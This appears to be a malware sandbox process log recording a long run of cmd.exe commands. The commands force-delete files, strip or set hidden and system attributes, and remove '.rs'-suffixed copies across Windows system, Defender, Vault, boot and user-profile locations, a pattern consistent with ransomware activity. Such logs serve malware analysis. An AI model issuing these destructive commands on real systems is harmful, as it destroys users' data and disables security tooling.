C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Garden.htm""
3⤵
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Garden.htm.rs""
3⤵
PID:5596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov""
3⤵
PID:6740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov""
3⤵
PID:12624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk""
3⤵
PID:8708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:10804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini""
3⤵
PID:11592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini""
3⤵
PID:6732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.rs""
3⤵
PID:1236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\MasterDatastore.xml""
3⤵
PID:16348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\microsoft shared\Stationery\Bears.jpg""
3⤵
PID:11068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""
3⤵
PID:12496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Libraries\RecordedTV.library-ms""
3⤵
PID:20296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\3cdfe6d988b300b9272f3ad743b8c7fa\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.ni.dll.aux""
3⤵
PID:7596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime.xml""
3⤵
PID:196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\debug\PASSWD.LOG""
3⤵
PID:6864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat""
3⤵
PID:14840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\rtscom.dll.mui.rs""
3⤵
PID:4728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\README_th_en_CA_v2.txt""
3⤵
PID:7960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Windows Live\Bici\_01.sqm""
3⤵
PID:7888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\ado\msado15.dll""
3⤵
PID:19632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
3⤵
PID:7468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\hu-HU\bootmgr.exe.mui""
3⤵
PID:6308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office32mui.msi.16.en-us.xml""
3⤵
PID:12928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\et-EE\bootmgr.exe.mui.rs""
3⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.dic""
3⤵
PID:10476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\explorer.exe.rs""
3⤵
PID:19536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.rs""
3⤵
PID:20184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\MasterDatastore.xml""
3⤵
PID:20832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tqq24hzz.default-release\cache2\entries\1BBC7759CBC162CA4A6DD44B4D4454193297867E""
3⤵
PID:20748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\47cc728f68a7ffa11498047424fb014c\Microsoft.PowerShell.GPowerShell.ni.dll.aux""
3⤵
PID:16136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\Stationery\Bears.jpg.rs""
3⤵
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:15208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\en-us.16\stream.x64.en-us.man.dat""
3⤵
PID:20440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\1ed237dc989dfd04b7946ae0dfccde11\Microsoft.WSMan.Runtime.ni.dll.aux""
3⤵
PID:20840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Temp\chrome_installer.log""
3⤵
PID:14656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico""
3⤵
PID:15384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63""
3⤵
PID:13844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\de-DE\tipresx.dll.mui""
3⤵
PID:14084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\it-IT\bootmgr.exe.mui""
3⤵
PID:20648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini""
3⤵
PID:12408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll.rs""
3⤵
PID:12424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\en-US\bootmgr.exe.mui""
3⤵
PID:11520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini""
3⤵
PID:14472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.rs""
3⤵
PID:9772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\GapaEngine.dll""
3⤵
PID:15792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\de-DE\tipresx.dll.mui""
3⤵
PID:16072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\GapaEngine.dll""
3⤵
PID:12748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\hu-HU\bootmgr.exe.mui""
3⤵
PID:10324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\Documents\desktop.ini""
3⤵
PID:8224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Documents\desktop.ini.rs""
3⤵
PID:6356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\Libraries\desktop.ini""
3⤵
PID:11616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Libraries\desktop.ini.rs""
3⤵
PID:8544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_64\System\031bf5d3b6e41a403df75304dabe79f9\System.ni.dll""
3⤵
PID:19664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Music\CopyDismount.jpg""
3⤵
PID:8976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\en-US\bootmgr.exe.mui.rs""
3⤵
PID:17416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico""
3⤵
PID:16836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db""
3⤵
PID:8636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.rs""
3⤵
PID:13764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Downloads\desktop.ini""
3⤵
PID:17272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat""
3⤵
PID:15888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\Downloads\desktop.ini""
3⤵
PID:7424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat""
3⤵
PID:20928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\de-DE\memtest.exe.mui""
3⤵
PID:18536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\es-ES\tipresx.dll.mui""
3⤵
PID:18524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\Videos\desktop.ini""
3⤵
PID:12284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\de-DE\memtest.exe.mui""
3⤵
PID:7912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\el-GR\tipresx.dll.mui""
3⤵
PID:15752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\el-GR\tipresx.dll.mui""
3⤵
PID:15440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63""
3⤵
PID:7652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime.xml""
3⤵
PID:3320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\hr-HR\bootmgr.exe.mui""
3⤵
PID:15988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\hr-HR\bootmgr.exe.mui""
3⤵
PID:5564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif""
3⤵
PID:7488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif""
3⤵
PID:17064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini""
3⤵
PID:10984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini""
3⤵
PID:13208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\3c09bd3a89b1810d75a115a3744cb0b4\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll.aux""
3⤵
PID:14460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.5B""
3⤵
PID:20712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\fi-FI\memtest.exe.mui""
3⤵
PID:12868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime.xml.rs""
3⤵
PID:5412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserManifest.xml""
3⤵
PID:14196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db""
3⤵
PID:21636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\245e5d8e8dc8d3f5dc32dfc273c51666\Microsoft.WindowsAuthenticationProtocols.Commands.ni.dll.aux""
3⤵
PID:14040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.json""
3⤵
PID:7016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\x-none.16\stream.x64.x-none.db""
3⤵
PID:9364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
3⤵
PID:11476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
3⤵
PID:9308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63""
3⤵
PID:7820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\wab32res.dll""
3⤵
PID:9728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000E781\04_Music_played_in_the_last_month.wpl""
3⤵
PID:15396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\msdaer.dll""
3⤵
PID:11432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
3⤵
PID:7268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\wab32.dll.rs""
3⤵
PID:19164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd.rs""
3⤵
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271""
3⤵
PID:7956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\ntuser.ini""
3⤵
PID:10752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\ntuser.ini.rs""
3⤵
PID:15916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
3⤵
PID:8404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\ko-KR\bootmgr.exe.mui""
3⤵
PID:19508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.5B""
3⤵
PID:10680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\User Account Pictures\user-40.png""
3⤵
PID:16248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.rs""
3⤵
PID:13256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\fi-FI\bootmgr.exe.mui""
3⤵
PID:22352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\fi-FI\bootmgr.exe.mui.rs""
3⤵
PID:22344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\ntuser.ini""
3⤵
PID:22336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\System\Ole DB\msdaenum.dll""
3⤵
PID:22328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms""
3⤵
PID:22320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\msdaenum.dll.rs""
3⤵
PID:21988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e0640f883566b92bf0886fd87ab43cf6\Microsoft.Tpm.Commands.ni.dll.aux""
3⤵
PID:21980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.rs""
3⤵
PID:21952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\el-GR\memtest.exe.mui""
3⤵
PID:21856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\el-GR\memtest.exe.mui""
3⤵
PID:21848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat""
3⤵
PID:21592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\container.dat""
3⤵
PID:21572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\container.dat.rs""
3⤵
PID:21564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime\0__Power_Policy.provxml""
3⤵
PID:15248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime.xml""
3⤵
PID:12864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\RecoveryStore.{7E175125-9865-11EB-B2D8-5EDB842E78E7}.dat""
3⤵
PID:17696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
3⤵
PID:5928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""
3⤵
PID:7592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime.xml""
3⤵
PID:19068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\3af728da7597f37ee0670b24059b1407\Microsoft.PowerShell.Utility.Activities.ni.dll.aux""
3⤵
PID:14272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""
3⤵
PID:15936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcer.dll.mui""
3⤵
PID:5584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml""
3⤵
PID:18676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\224ad792ad202c926c2f36dc743efed4\Microsoft.PowerShell.Editor.ni.dll""
3⤵
PID:16252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime.xml""
3⤵
PID:3308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat""
3⤵
PID:7172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\es-MX\bootmgr.exe.mui""
3⤵
PID:20640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Internet Explorer\ie9props.propdesc""
3⤵
PID:20864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\es-MX\bootmgr.exe.mui.rs""
3⤵
PID:8944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Internet Explorer\ie9props.propdesc""
3⤵
PID:8668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\0e023f768ea22bb2e1e58b24092e2d30\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dll.aux""
3⤵
PID:10880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
3⤵
PID:6240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime.xml""
3⤵
PID:16796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime\0__Power_EnergyEstimationEngine.provxml""
3⤵
PID:18008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\3d0ac6114a48b77a56a542fa3b5231d1\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.ni.dll.aux""
3⤵
PID:7364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\en-US\bootfix.bin""
3⤵
PID:11620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\plugin.X.manifest""
3⤵
PID:19176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\7457301ac6384f4370d4529eb7f0f64b\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.ni.dll.aux""
3⤵
PID:17108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol""
3⤵
PID:17268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Support\MpWppTracing-04082021-121055-00000003-ffffffff.bin""
3⤵
PID:20860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\60cdf0816278bf540dd5e4da46e7f979\Microsoft.Management.Infrastructure.Native.ni.dll.aux""
3⤵
PID:6724

C:\Windows\system32\cmd.exe
